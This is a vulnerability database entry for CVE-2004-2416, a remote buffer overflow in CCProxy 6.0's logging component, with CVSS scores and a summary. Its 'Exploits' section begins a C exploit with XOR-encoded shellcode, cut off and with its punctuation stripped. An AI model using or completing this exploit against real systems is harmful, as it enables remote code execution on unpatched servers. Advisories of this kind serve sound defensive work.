7.5
CVSSv2

CVE-2004-2416

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in the logging component of CCProxy allows remote malicious users to execute arbitrary code via a long HTTP GET request.

Vulnerable Product Search on Vulmon Subscribe to Product

youngzsoft ccproxy 6.0

Exploits

#include <stdioh> #include <windowsh> #include <winsockh> #pragma comment(lib, "ws2_32") unsigned char EndChar[]= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/10 unsigned char shellcode[] = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" "xe8xedxffxffxff" /* 254 bytes shellcode, xor with 0xee */ /* offset 92=IP ...